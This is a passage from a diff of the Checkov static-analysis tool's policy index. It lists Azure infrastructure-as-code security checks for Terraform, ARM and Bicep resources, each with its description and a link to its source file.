CDN enables the HTTPS endpoint | Terraform | [CDNEnableHttpsEndpoints.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CDNEnableHttpsEndpoints.py) | +| 2014 | CKV_AZURE_199 | resource | azurerm_servicebus_namespace | Ensure that Azure Service Bus uses double encryption | Terraform | [AzureServicebusDoubleEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusDoubleEncryptionEnabled.py) | +| 2015 | CKV_AZURE_200 | resource | azurerm_cdn_endpoint_custom_domain | Ensure the Azure CDN endpoint is using the latest version of TLS encryption | Terraform | [CDNTLSProtocol12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CDNTLSProtocol12.py) | +| 2016 | CKV_AZURE_201 | resource | azurerm_servicebus_namespace | Ensure that Azure Service Bus uses a customer-managed key to encrypt data | Terraform | [AzureServicebusHasCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusHasCMK.py) | +| 2017 | CKV_AZURE_202 | resource | azurerm_servicebus_namespace | Ensure that Managed identity provider is enabled for Azure Service Bus | Terraform | [AzureServicebusIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusIdentityProviderEnabled.py) | +| 2018 | CKV_AZURE_203 | resource | azurerm_servicebus_namespace | Ensure Azure Service Bus Local Authentication is disabled | Terraform | [AzureServicebusLocalAuthDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusLocalAuthDisabled.py) | +| 2019 | CKV_AZURE_204 | resource | azurerm_servicebus_namespace | Ensure 'public network access enabled' is set to 'False' for Azure Service Bus | Terraform | [AzureServicebusPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusPublicAccessDisabled.py) | +| 2020 | CKV_AZURE_205 | resource | azurerm_servicebus_namespace | Ensure Azure Service Bus is using the latest version of TLS encryption | Terraform | [AzureServicebusMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusMinTLSVersion.py) | +| 2021 | CKV_AZURE_206 | resource | azurerm_storage_account | Ensure that Storage Accounts use replication | Terraform | [StorageAccountsUseReplication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountsUseReplication.py) | +| 2022 | CKV_AZURE_207 | resource | azurerm_search_service | Ensure Azure Cognitive Search service uses managed identities to access Azure resources | Terraform | [AzureSearchManagedIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchManagedIdentity.py) | +| 2023 | CKV_AZURE_208 | resource | azurerm_search_service | Ensure that Azure Cognitive Search maintains SLA for index updates | Terraform | [AzureSearchSLAIndex.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchSLAIndex.py) | +| 2024 | CKV_AZURE_209 | resource | azurerm_search_service | Ensure that Azure Cognitive Search maintains SLA for search index queries | Terraform | [AzureSearchSLAQueryUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchSLAQueryUpdates.py) | +| 2025 | CKV_AZURE_210 | resource | azurerm_search_service | Ensure Azure Cognitive Search service allowed IPS does not give public Access | Terraform | [AzureSearchAllowedIPsNotGlobal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchAllowedIPsNotGlobal.py) | +| 2026 | CKV_AZURE_211 | resource | azurerm_service_plan | Ensure App Service plan suitable for production use | Terraform | [AppServiceSkuMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSkuMinimum.py) | +| 2027 | CKV_AZURE_212 | resource | azurerm_service_plan | Ensure App Service has a minimum number of instances for failover | Terraform | [AppServiceInstanceMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceInstanceMinimum.py) | +| 2028 | CKV_AZURE_213 | resource | azurerm_app_service | Ensure that App Service configures health check | Terraform | [AppServiceSetHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSetHealthCheck.py) | +| 2029 | CKV_AZURE_213 | resource | azurerm_linux_web_app | Ensure that App Service configures health check | Terraform | [AppServiceSetHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSetHealthCheck.py) | +| 2030 | CKV_AZURE_213 | resource | azurerm_windows_web_app | Ensure that App Service configures health check | Terraform | [AppServiceSetHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSetHealthCheck.py) | +| 2031 | CKV_AZURE_214 | resource | azurerm_linux_web_app | Ensure App Service is set to be always on | Terraform | [AppServiceAlwaysOn.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAlwaysOn.py) | +| 2032 | CKV_AZURE_214 | resource | azurerm_windows_web_app | Ensure App Service is set to be always on | Terraform | [AppServiceAlwaysOn.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAlwaysOn.py) | +| 2033 | CKV_AZURE_215 | resource | azurerm_api_management_backend | Ensure API management backend uses https | Terraform | [APIManagementBackendHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIManagementBackendHTTPS.py) | +| 2034 | CKV_AZURE_216 | resource | Microsoft.Network/azureFirewalls | Ensure DenyIntelMode is set to Deny for Azure Firewalls | arm | [AzureFirewallDenyThreatIntelMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureFirewallDenyThreatIntelMode.py) | +| 2035 | CKV_AZURE_216 | resource | Microsoft.Network/azureFirewalls | Ensure DenyIntelMode is set to Deny for Azure Firewalls | Bicep | [AzureFirewallDenyThreatIntelMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureFirewallDenyThreatIntelMode.py) | +| 2036 | CKV_AZURE_216 | resource | azurerm_firewall | Ensure DenyIntelMode is set to Deny for Azure Firewalls | Terraform | [AzureFirewallDenyThreatIntelMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureFirewallDenyThreatIntelMode.py) | +| 2037 | CKV_AZURE_217 | resource | azurerm_application_gateway | Ensure Azure Application gateways listener that allow connection requests over HTTP | Terraform | [AppGWUsesHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppGWUsesHttps.py) | +| 2038 | CKV_AZURE_218 | resource | Microsoft.Network/applicationGateways | Ensure Application Gateway defines secure protocols for in transit communication | arm | [AppGWDefinesSecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppGWDefinesSecureProtocols.py) | +| 2039 | CKV_AZURE_218 | resource | Microsoft.Network/applicationGateways | Ensure Application Gateway defines secure protocols for in transit communication | Bicep | [AppGWDefinesSecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppGWDefinesSecureProtocols.py) | +| 2040 | CKV_AZURE_218 | resource | azurerm_application_gateway | Ensure Application Gateway defines secure protocols for in transit communication | Terraform | [AppGWDefinesSecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppGWDefinesSecureProtocols.py) | +| 2041 | CKV_AZURE_219 | resource | azurerm_firewall | Ensure Firewall defines a firewall policy | Terraform | [AzureFirewallDefinesPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureFirewallDefinesPolicy.py) | +| 2042 | CKV_AZURE_220 | resource | azurerm_firewall_policy | Ensure Firewall policy has IDPS mode as deny | Terraform | [AzureFirewallPolicyIDPSDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureFirewallPolicyIDPSDeny.py) | +| 2043 | CKV_AZURE_221 | resource | azurerm_linux_function_app | Ensure that Azure Function App public network access is disabled | Terraform | [FunctionAppPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppPublicAccessDisabled.py) | +| 2044 | CKV_AZURE_221 | resource | azurerm_linux_function_app_slot | Ensure that Azure Function App public network access is disabled | Terraform | [FunctionAppPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppPublicAccessDisabled.py) | +| 2045 | CKV_AZURE_221 | resource | azurerm_windows_function_app | Ensure that Azure Function App public network access is disabled | Terraform | [FunctionAppPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppPublicAccessDisabled.py) | +| 2046 | CKV_AZURE_221 | resource | azurerm_windows_function_app_slot | Ensure that Azure Function App public network access is disabled | Terraform | [FunctionAppPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppPublicAccessDisabled.py) | +| 2047 | CKV_AZURE_222 | resource | azurerm_linux_web_app | Ensure that Azure Web App public network access is disabled | Terraform | [AppServicePublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePublicAccessDisabled.py) | +| 2048 | CKV_AZURE_222 | resource | azurerm_windows_web_app | Ensure that Azure Web App public network access is disabled | Terraform | [AppServicePublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePublicAccessDisabled.py) | +| 2049 | CKV_AZURE_223 | resource | azurerm_eventhub_namespace | Ensure Event Hub Namespace uses at least TLS 1.2 | Terraform | [EventHubNamespaceMinTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventHubNamespaceMinTLS12.py) | +| 2050 | CKV_AZURE_224 | resource | azurerm_mssql_database | Ensure that the Ledger feature is enabled on database that requires cryptographic proof and nonrepudiation of data integrity | Terraform | [SQLDatabaseLedgerEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLDatabaseLedgerEnabled.py) | +| 2051 | CKV_AZURE_225 | resource | azurerm_service_plan | Ensure the App Service Plan is zone redundant | Terraform | [AppServicePlanZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePlanZoneRedundant.py) | +| 2052 | CKV_AZURE_226 | resource | azurerm_kubernetes_cluster | Ensure ephemeral disks are used for OS disks | Terraform | [AKSEphemeralOSDisks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSEphemeralOSDisks.py) | +| 2053 | CKV_AZURE_227 | resource | azurerm_kubernetes_cluster | Ensure that the AKS cluster encrypt temp disks, caches, and data flows between Compute and Storage resources | Terraform | [AKSEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSEncryptionAtHostEnabled.py) | +| 2054 | CKV_AZURE_227 | resource | azurerm_kubernetes_cluster_node_pool | Ensure that the AKS cluster encrypt temp disks, caches, and data flows between Compute and Storage resources | Terraform | [AKSEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSEncryptionAtHostEnabled.py) | +| 2055 | CKV_AZURE_228 | resource | azurerm_eventhub_namespace | Ensure the Azure Event Hub Namespace is zone redundant | Terraform | [EventHubNamespaceZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventHubNamespaceZoneRedundant.py) | +| 2056 | CKV_AZURE_229 | resource | azurerm_mssql_database | Ensure the Azure SQL Database Namespace is zone redundant | Terraform | [SQLDatabaseZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLDatabaseZoneRedundant.py) | +| 2057 | CKV_AZURE_230 | resource | azurerm_redis_cache | Standard Replication should be enabled | Terraform | [RedisCacheStandardReplicationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/RedisCacheStandardReplicationEnabled.py) | +| 2058 | CKV_AZURE_231 | resource | azurerm_app_service_environment_v3 | Ensure App Service Environment is zone redundant | Terraform | [AppServiceEnvironmentZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceEnvironmentZoneRedundant.py) | +| 2059 | CKV_AZURE_232 | resource | azurerm_kubernetes_cluster | Ensure that only critical system pods run on system nodes | Terraform | [AKSOnlyCriticalPodsOnSystemNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSOnlyCriticalPodsOnSystemNodes.py) | +| 2060 | CKV_AZURE_233 | resource | azurerm_container_registry | Ensure Azure Container Registry (ACR) is zone redundant | Terraform | [ACREnableZoneRedundancy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACREnableZoneRedundancy.py) | +| 2061 | CKV_AZURE_234 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender for cloud is set to On for Resource Manager | Terraform | [AzureDefenderDisabledForResManager.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderDisabledForResManager.py) | +| 2062 | CKV_AZURE_235 | resource | azurerm_container_group | Ensure that Azure container environment variables are configured with secure values only | Terraform | [AzureContainerInstanceEnvVarSecureValueType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureContainerInstanceEnvVarSecureValueType.py) | +| 2063 | CKV_AZURE_236 | resource | Microsoft.CognitiveServices/accounts | Ensure that Cognitive Services accounts enable local authentication | arm | [CognitiveServicesEnableLocalAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CognitiveServicesEnableLocalAuth.py) | +| 2064 | CKV_AZURE_236 | resource | Microsoft.CognitiveServices/accounts | Ensure that Cognitive Services accounts enable local authentication | Bicep | [CognitiveServicesEnableLocalAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CognitiveServicesEnableLocalAuth.py) | +| 2065 | CKV_AZURE_236 | resource | azurerm_cognitive_account | Ensure that Cognitive Services accounts enable local authentication | Terraform | [CognitiveServicesEnableLocalAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CognitiveServicesEnableLocalAuth.py) | +| 2066 | CKV_AZURE_237 | resource | azurerm_container_registry | Ensure dedicated data endpoints are enabled. | Terraform | [ACRDedicatedDataEndpointEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRDedicatedDataEndpointEnabled.py) | +| 2067 | CKV_AZURE_238 | resource | Microsoft.CognitiveServices/accounts | Ensure that Cognitive Services account is not configured with managed identity | arm | [CognitiveServicesConfigureIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CognitiveServicesConfigureIdentity.py) | +| 2068 | CKV_AZURE_238 | resource | Microsoft.CognitiveServices/accounts | Ensure that Cognitive Services account is not configured with managed identity | Bicep | [CognitiveServicesConfigureIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CognitiveServicesConfigureIdentity.py) | +| 2069 | CKV_AZURE_238 | resource | azurerm_cognitive_account | Ensure that Cognitive Services account is not configured with managed identity | Terraform | [CognitiveServicesConfigureIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CognitiveServicesConfigureIdentity.py) | +| 2070 | CKV_AZURE_239 | resource | Microsoft.MachineLearningServices/workspaces | Ensure Azure Machine learning workspace is not configured with private endpoint | arm | [AzureMLWorkspacePrivateEndpoint.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureMLWorkspacePrivateEndpoint.py) | +| 2071 | CKV_AZURE_239 | resource | Microsoft.MachineLearningServices/workspaces | Ensure Azure Machine learning workspace is not configured with private endpoint | Bicep | [AzureMLWorkspacePrivateEndpoint.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureMLWorkspacePrivateEndpoint.py) | +| 2072 | CKV2_AZURE_1 | resource | azurerm_storage_account | Ensure storage for critical data are encrypted with Customer Managed Key | Terraform | [StorageCriticalDataEncryptedCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageCriticalDataEncryptedCMK.yaml) | +| 2073 | CKV2_AZURE_2 | resource | azurerm_mssql_server_security_alert_policy | Ensure that Vulnerability Assessment (VA) is enabled on a SQL server by setting a Storage Account | Terraform | [VAisEnabledInStorageAccount.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAisEnabledInStorageAccount.yaml) | +| 2074 | CKV2_AZURE_2 | resource | azurerm_sql_server | Ensure that Vulnerability Assessment (VA) is enabled on a SQL server by setting a Storage Account | Terraform | [VAisEnabledInStorageAccount.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAisEnabledInStorageAccount.yaml) | +| 2075 | CKV2_AZURE_3 | resource | azurerm_mssql_server | Ensure that VA setting Periodic Recurring Scans is enabled on a SQL server | Terraform | [VAsetPeriodicScansOnSQL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAsetPeriodicScansOnSQL.yaml) | +| 2076 | CKV2_AZURE_3 | resource | azurerm_mssql_server_security_alert_policy | Ensure that VA setting Periodic Recurring Scans is enabled on a SQL server | Terraform | [VAsetPeriodicScansOnSQL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAsetPeriodicScansOnSQL.yaml) | +| 2077 | CKV2_AZURE_3 | resource | azurerm_mssql_server_vulnerability_assessment | Ensure that VA setting Periodic Recurring Scans is enabled on a SQL server | Terraform | [VAsetPeriodicScansOnSQL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAsetPeriodicScansOnSQL.yaml) | +| 2078 | CKV2_AZURE_3 | resource | azurerm_sql_server | Ensure that VA setting Periodic Recurring Scans is enabled on a SQL server | Terraform | [VAsetPeriodicScansOnSQL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAsetPeriodicScansOnSQL.yaml) | +| 2079 | CKV2_AZURE_4 | resource | azurerm_mssql_server | Ensure Azure SQL server ADS VA Send scan reports to is configured | Terraform | [VAconfiguredToSendReports.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReports.yaml) | +| 2080 | CKV2_AZURE_4 | resource | azurerm_mssql_server_security_alert_policy | Ensure Azure SQL server ADS VA Send scan reports to is configured | Terraform | [VAconfiguredToSendReports.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReports.yaml) | +| 2081 | CKV2_AZURE_4 | resource | azurerm_mssql_server_vulnerability_assessment | Ensure Azure SQL server ADS VA Send scan reports to is configured | Terraform | [VAconfiguredToSendReports.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReports.yaml) | +| 2082 | CKV2_AZURE_4 | resource | azurerm_sql_server | Ensure Azure SQL server ADS VA Send scan reports to is configured | Terraform | [VAconfiguredToSendReports.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReports.yaml) | +| 2083 | CKV2_AZURE_5 | resource | azurerm_mssql_server | Ensure that VA setting 'Also send email notifications to admins and subscription owners' is set for a SQL server | Terraform | [VAconfiguredToSendReportsToAdmins.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReportsToAdmins.yaml) | +| 2084 | CKV2_AZURE_5 | resource | azurerm_mssql_server_security_alert_policy | Ensure that VA setting 'Also send email notifications to admins and subscription owners' is set for a SQL server | Terraform | [VAconfiguredToSendReportsToAdmins.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReportsToAdmins.yaml) | +| 2085 | CKV2_AZURE_5 | resource | azurerm_mssql_server_vulnerability_assessment | Ensure that VA setting 'Also send email notifications to admins and subscription owners' is set for a SQL server | Terraform | [VAconfiguredToSendReportsToAdmins.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReportsToAdmins.yaml) | +| 2086 | CKV2_AZURE_5 | resource | azurerm_sql_server | Ensure that VA setting 'Also send email notifications to admins and subscription owners' is set for a SQL server | Terraform | [VAconfiguredToSendReportsToAdmins.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReportsToAdmins.yaml) | +| 2087 | CKV2_AZURE_6 | resource | azurerm_sql_firewall_rule | Ensure 'Allow access to Azure services' for PostgreSQL Database Server is disabled | Terraform | [AccessToPostgreSQLFromAzureServicesIsDisabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AccessToPostgreSQLFromAzureServicesIsDisabled.yaml) | +| 2088 | CKV2_AZURE_6 | resource | azurerm_sql_server | Ensure 'Allow access to Azure services' for PostgreSQL Database Server is disabled | Terraform | [AccessToPostgreSQLFromAzureServicesIsDisabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AccessToPostgreSQLFromAzureServicesIsDisabled.yaml) | +| 2089 | CKV2_AZURE_7 | resource | azurerm_sql_server | Ensure that Azure Active Directory Admin is configured | Terraform | [AzureActiveDirectoryAdminIsConfigured.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureActiveDirectoryAdminIsConfigured.yaml) | +| 2090 | CKV2_AZURE_8 | resource | azurerm_monitor_activity_log_alert | Ensure the storage container storing the activity logs is not publicly accessible | Terraform | [StorageContainerActivityLogsNotPublic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageContainerActivityLogsNotPublic.yaml) | +| 2091 | CKV2_AZURE_8 | resource | azurerm_storage_account | Ensure the storage container storing the activity logs is not publicly accessible | Terraform | [StorageContainerActivityLogsNotPublic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageContainerActivityLogsNotPublic.yaml) | +| 2092 | CKV2_AZURE_8 | resource | azurerm_storage_container | Ensure the storage container storing the activity logs is not publicly accessible | Terraform | [StorageContainerActivityLogsNotPublic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageContainerActivityLogsNotPublic.yaml) | +| 2093 | CKV2_AZURE_9 | resource | azurerm_virtual_machine | Ensure Virtual Machines are utilizing Managed Disks | Terraform | [VirtualMachinesUtilizingManagedDisks.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VirtualMachinesUtilizingManagedDisks.yaml) | +| 2094 | CKV2_AZURE_10 | resource | azurerm_virtual_machine | Ensure that Microsoft Antimalware is configured to automatically updates for Virtual Machines | Terraform | [AzureAntimalwareIsConfiguredWithAutoUpdatesForVMs.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAntimalwareIsConfiguredWithAutoUpdatesForVMs.yaml) | +| 2095 | CKV2_AZURE_10 | resource | azurerm_virtual_machine_extension | Ensure that Microsoft Antimalware is configured to automatically updates for Virtual Machines | Terraform | [AzureAntimalwareIsConfiguredWithAutoUpdatesForVMs.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAntimalwareIsConfiguredWithAutoUpdatesForVMs.yaml) | +| 2096 | CKV2_AZURE_11 | resource | azurerm_kusto_cluster | Ensure that Azure Data Explorer encryption at rest uses a customer-managed key | Terraform | [DataExplorerEncryptionUsesCustomKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/DataExplorerEncryptionUsesCustomKey.yaml) | +| 2097 | CKV2_AZURE_12 | resource | azurerm_virtual_machine | Ensure that virtual machines are backed up using Azure Backup | Terraform | [VMHasBackUpMachine.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VMHasBackUpMachine.yaml) | +| 2098 | CKV2_AZURE_13 | resource | azurerm_mssql_server_security_alert_policy | Ensure that sql servers enables data security policy | Terraform | [AzureMSSQLServerHasSecurityAlertPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMSSQLServerHasSecurityAlertPolicy.yaml) | +| 2099 | CKV2_AZURE_13 | resource | azurerm_sql_server | Ensure that sql servers enables data security policy | Terraform | [AzureMSSQLServerHasSecurityAlertPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMSSQLServerHasSecurityAlertPolicy.yaml) | +| 2100 | CKV2_AZURE_14 | resource | azurerm_managed_disk | Ensure that Unattached disks are encrypted | Terraform | [AzureUnattachedDisksAreEncrypted.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureUnattachedDisksAreEncrypted.yaml) | +| 2101 | CKV2_AZURE_14 | resource | azurerm_virtual_machine | Ensure that Unattached disks are encrypted | Terraform | [AzureUnattachedDisksAreEncrypted.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureUnattachedDisksAreEncrypted.yaml) | +| 2102 | CKV2_AZURE_15 | resource | azurerm_data_factory | Ensure that Azure data factories are encrypted with a customer-managed key | Terraform | [AzureDataFactoriesEncryptedWithCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureDataFactoriesEncryptedWithCustomerManagedKey.yaml) | +| 2103 | CKV2_AZURE_16 | resource | azurerm_mysql_server | Ensure that MySQL server enables customer-managed key for encryption | Terraform | [MSQLenablesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/MSQLenablesCustomerManagedKey.yaml) | +| 2104 | CKV2_AZURE_16 | resource | azurerm_mysql_server_key | Ensure that MySQL server enables customer-managed key for encryption | Terraform | [MSQLenablesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/MSQLenablesCustomerManagedKey.yaml) | +| 2105 | CKV2_AZURE_17 | resource | azurerm_postgresql_server | Ensure that PostgreSQL server enables customer-managed key for encryption | Terraform | [PGSQLenablesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/PGSQLenablesCustomerManagedKey.yaml) | +| 2106 | CKV2_AZURE_17 | resource | azurerm_postgresql_server_key | Ensure that PostgreSQL server enables customer-managed key for encryption | Terraform | [PGSQLenablesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/PGSQLenablesCustomerManagedKey.yaml) | +| 2107 | CKV2_AZURE_19 | resource | azurerm_synapse_workspace | Ensure that Azure Synapse workspaces have no IP firewall rules attached | Terraform | [AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached.yaml) | +| 2108 | CKV2_AZURE_20 | resource | azurerm_log_analytics_storage_insights | Ensure Storage logging is enabled for Table service for read requests | Terraform | [StorageLoggingIsEnabledForTableService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForTableService.yaml) | +| 2109 | CKV2_AZURE_20 | resource | azurerm_storage_account | Ensure Storage logging is enabled for Table service for read requests | Terraform | [StorageLoggingIsEnabledForTableService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForTableService.yaml) | +| 2110 | CKV2_AZURE_20 | resource | azurerm_storage_table | Ensure Storage logging is enabled for Table service for read requests | Terraform | [StorageLoggingIsEnabledForTableService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForTableService.yaml) | +| 2111 | CKV2_AZURE_21 | resource | azurerm_log_analytics_storage_insights | Ensure Storage logging is enabled for Blob service for read requests | Terraform | [StorageLoggingIsEnabledForBlobService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForBlobService.yaml) | +| 2112 | CKV2_AZURE_21 | resource | azurerm_storage_account | Ensure Storage logging is enabled for Blob service for read requests | Terraform | [StorageLoggingIsEnabledForBlobService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForBlobService.yaml) | +| 2113 | CKV2_AZURE_21 | resource | azurerm_storage_container | Ensure Storage logging is enabled for Blob service for read requests | Terraform | [StorageLoggingIsEnabledForBlobService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForBlobService.yaml) | +| 